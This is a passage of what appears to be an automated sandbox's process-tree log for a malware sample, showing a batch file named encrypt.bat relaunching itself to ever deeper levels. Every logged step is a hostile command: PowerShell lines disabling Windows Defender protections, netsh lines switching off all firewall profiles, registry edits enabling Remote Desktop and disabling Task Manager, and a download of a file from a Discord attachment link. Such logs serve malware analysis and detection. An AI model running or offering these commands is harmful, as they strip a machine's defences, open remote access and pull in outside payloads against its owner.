  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  PID:3168
- (depth 6) C:\Windows\system32\netsh.exe
  netsh firewall set opmode disable
  - Modifies Windows Firewall
  PID:4764
- (depth 6) C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=DISABLE
  PID:3336
- (depth 6) C:\Windows\system32\netsh.exe
  netsh advfirewall set currentprofile state off
  - Modifies Windows Firewall
  PID:2964
- (depth 6) C:\Windows\system32\netsh.exe
  netsh advfirewall set domainprofile state off
  - Modifies Windows Firewall
  PID:292
- (depth 6) C:\Windows\system32\netsh.exe
  netsh advfirewall set privateprofile state off
  PID:1804
- (depth 6) C:\Windows\system32\netsh.exe
  netsh advfirewall set publicprofile state off
  - Modifies Windows Firewall
  PID:3428
- (depth 6) C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  PID:992
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  PID:4696
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  PID:2052
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  - Command and Scripting Interpreter: PowerShell
  PID:2964
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  PID:2140
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  - Command and Scripting Interpreter: PowerShell
  PID:4820
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  PID:4736
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  PID:428
- (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
  PID:5108
- (depth 7) C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
  PID:3852
- (depth 8) C:\Windows\system32\reg.exe
  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
  PID:1536
- (depth 8) C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
  PID:292
- (depth 8) C:\Windows\system32\reg.exe
  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
  PID:5004
- (depth 8) C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  PID:2964
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  - Command and Scripting Interpreter: PowerShell
  PID:4916
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  PID:1284
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  PID:4504
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  PID:4608
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  - Command and Scripting Interpreter: PowerShell
  PID:1564
- (depth 8) C:\Windows\system32\netsh.exe
  netsh firewall set opmode disable
  - Modifies Windows Firewall
  PID:4132
- (depth 8) C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=DISABLE
  PID:2936
- (depth 8) C:\Windows\system32\netsh.exe
  netsh advfirewall set currentprofile state off
  - Modifies Windows Firewall
  PID:5108
- (depth 8) C:\Windows\system32\netsh.exe
  netsh advfirewall set domainprofile state off
  PID:3632
- (depth 8) C:\Windows\system32\netsh.exe
  netsh advfirewall set privateprofile state off
  - Modifies Windows Firewall
  PID:1888
- (depth 8) C:\Windows\system32\netsh.exe
  netsh advfirewall set publicprofile state off
  - Modifies Windows Firewall
  PID:3812
- (depth 8) C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  PID:1304
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  - Command and Scripting Interpreter: PowerShell
  PID:1804
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  - Command and Scripting Interpreter: PowerShell
  PID:3556
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  PID:2608
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  - Command and Scripting Interpreter: PowerShell
  PID:2640
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  - Command and Scripting Interpreter: PowerShell
  PID:1788
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  - Command and Scripting Interpreter: PowerShell
  PID:1936
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
  - Blocklisted process makes network request
  PID:4132
- (depth 8) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
  PID:2276
- (depth 9) C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
  PID:4404
- (depth 10) C:\Windows\system32\reg.exe
  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
  PID:936
- (depth 10) C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
  PID:2384
- (depth 10) C:\Windows\system32\reg.exe
  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
  PID:2144
- (depth 10) C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  PID:3624
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  PID:4796
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  PID:5032
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  PID:4980
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  PID:2936
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  PID:32
- (depth 10) C:\Windows\system32\netsh.exe
  netsh firewall set opmode disable
  PID:2452
- (depth 10) C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=DISABLE
  - Modifies Windows Firewall
  PID:4012
- (depth 10) C:\Windows\system32\netsh.exe
  netsh advfirewall set currentprofile state off
  PID:640
- (depth 10) C:\Windows\system32\netsh.exe
  netsh advfirewall set domainprofile state off
  - Modifies Windows Firewall
  PID:204
- (depth 10) C:\Windows\system32\netsh.exe
  netsh advfirewall set privateprofile state off
  PID:4220
- (depth 10) C:\Windows\system32\netsh.exe
  netsh advfirewall set publicprofile state off
  PID:3040
- (depth 10) C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  - Modifies Windows Firewall
  PID:2204
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  PID:3688
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  PID:4004
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  PID:3852
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  PID:2956
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  - Command and Scripting Interpreter: PowerShell
  PID:3832
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  - Command and Scripting Interpreter: PowerShell
  PID:4232
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
  - Blocklisted process makes network request
  PID:1308
- (depth 10) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
  PID:3664
- (depth 11) C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
  PID:2360
- (depth 12) C:\Windows\system32\reg.exe
  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
  PID:32
- (depth 12) C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
  PID:2640
- (depth 12) C:\Windows\system32\reg.exe
  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
  PID:4500
- (depth 12) C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  PID:2948
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  - Command and Scripting Interpreter: PowerShell
  PID:3076
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  - Command and Scripting Interpreter: PowerShell
  PID:292
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  PID:3632
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  PID:3256
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  - Command and Scripting Interpreter: PowerShell
  PID:3348
- (depth 12) C:\Windows\system32\netsh.exe
  netsh firewall set opmode disable
  PID:2288
- (depth 12) C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=DISABLE
  - Modifies Windows Firewall
  PID:5104
- (depth 12) C:\Windows\system32\netsh.exe
  netsh advfirewall set currentprofile state off
  - Modifies Windows Firewall
  PID:428
- (depth 12) C:\Windows\system32\netsh.exe
  netsh advfirewall set domainprofile state off
  - Modifies Windows Firewall
  PID:2700
- (depth 12) C:\Windows\system32\netsh.exe
  netsh advfirewall set privateprofile state off
  - Modifies Windows Firewall
  PID:2320
- (depth 12) C:\Windows\system32\netsh.exe
  netsh advfirewall set publicprofile state off
  - Modifies Windows Firewall
  PID:2932
- (depth 12) C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  - Modifies Windows Firewall
  PID:2240
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  - Command and Scripting Interpreter: PowerShell
  PID:992
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  PID:4252
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  PID:5040
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  PID:4992
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  - Command and Scripting Interpreter: PowerShell
  PID:1576
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  PID:2700
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
  - Blocklisted process makes network request
  PID:4964
- (depth 12) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
  PID:1712
- (depth 13) C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
  PID:2748
- (depth 14) C:\Windows\system32\reg.exe
  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
  PID:1440
- (depth 14) C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
  PID:4004
- (depth 14) C:\Windows\system32\reg.exe
  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
  PID:2320
- (depth 14) C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  PID:860
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  - Command and Scripting Interpreter: PowerShell
  PID:2964
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  PID:4636
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  PID:3648
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  PID:2304
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  PID:2204
- (depth 14) C:\Windows\system32\netsh.exe
  netsh firewall set opmode disable
  - Modifies Windows Firewall
  PID:1108
- (depth 14) C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=DISABLE
  - Modifies Windows Firewall
  PID:4996
- (depth 14) C:\Windows\system32\netsh.exe
  netsh advfirewall set currentprofile state off
  PID:3852
- (depth 14) C:\Windows\system32\netsh.exe
  netsh advfirewall set domainprofile state off
  - Modifies Windows Firewall
  PID:2596
- (depth 14) C:\Windows\system32\netsh.exe
  netsh advfirewall set privateprofile state off
  - Modifies Windows Firewall
  PID:3928
- (depth 14) C:\Windows\system32\netsh.exe
  netsh advfirewall set publicprofile state off
  - Modifies Windows Firewall
  PID:3648
- (depth 14) C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  PID:376
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  PID:1100
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  PID:1968
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  PID:3688
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  PID:5084
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  - Command and Scripting Interpreter: PowerShell
  PID:2792
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  PID:4132
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
  - Blocklisted process makes network request
  PID:4584
- (depth 14) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
  PID:1168
- (depth 15) C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
  PID:1048
- (depth 16) C:\Windows\system32\reg.exe
  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
  PID:504
- (depth 16) C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
  PID:4932
- (depth 16) C:\Windows\system32\reg.exe
  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
  PID:592
- (depth 16) C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
  PID:676
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  PID:3852
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  PID:2300
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  PID:2440
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  - Command and Scripting Interpreter: PowerShell
  PID:2948
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  - Command and Scripting Interpreter: PowerShell
  PID:4584
- (depth 16) C:\Windows\system32\netsh.exe
  netsh firewall set opmode disable
  - Modifies Windows Firewall
  PID:2748
- (depth 16) C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=DISABLE
  - Modifies Windows Firewall
  PID:640
- (depth 16) C:\Windows\system32\netsh.exe
  netsh advfirewall set currentprofile state off
  PID:592
- (depth 16) C:\Windows\system32\netsh.exe
  netsh advfirewall set domainprofile state off
  PID:1916
- (depth 16) C:\Windows\system32\netsh.exe
  netsh advfirewall set privateprofile state off
  PID:5084
- (depth 16) C:\Windows\system32\netsh.exe
  netsh advfirewall set publicprofile state off
  PID:4408
- (depth 16) C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  - Modifies Windows Firewall
  PID:3100
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  - Command and Scripting Interpreter: PowerShell
  PID:2964
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
  - Command and Scripting Interpreter: PowerShell
  PID:4684
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
  PID:2360
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
  - Command and Scripting Interpreter: PowerShell
  PID:3472
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
  PID:3364
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
  PID:2072
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
  - Blocklisted process makes network request
  PID:1468
- (depth 16) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
  PID:4408
- (depth 17) C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
  PID:376
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"18⤵PID:3812
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f18⤵PID:744
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"18⤵PID:1540
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f18⤵PID:4608
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:204
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:3652 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable18⤵
- Modifies Windows Firewall
PID:5024 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE18⤵PID:4356
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off18⤵PID:2792
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off18⤵
- Modifies Windows Firewall
PID:904 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off18⤵PID:3472
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off18⤵
- Modifies Windows Firewall
PID:1424 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off18⤵PID:3336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"18⤵PID:1560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:4196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:4148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"18⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"18⤵PID:860
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"19⤵PID:3348
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"20⤵PID:4728
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f20⤵PID:4004
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"20⤵PID:32
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f20⤵PID:4584
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:4232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:4624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:2192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵
- Command and Scripting Interpreter: PowerShell
PID:4740 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable20⤵PID:428
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE20⤵
- Modifies Windows Firewall
PID:4108 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off20⤵
- Modifies Windows Firewall
PID:3964 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off20⤵
- Modifies Windows Firewall
PID:2748 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off20⤵
- Modifies Windows Firewall
PID:4196 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off20⤵
- Modifies Windows Firewall
PID:2192 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off20⤵
- Modifies Windows Firewall
PID:3316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"20⤵PID:780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:2452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:992
-
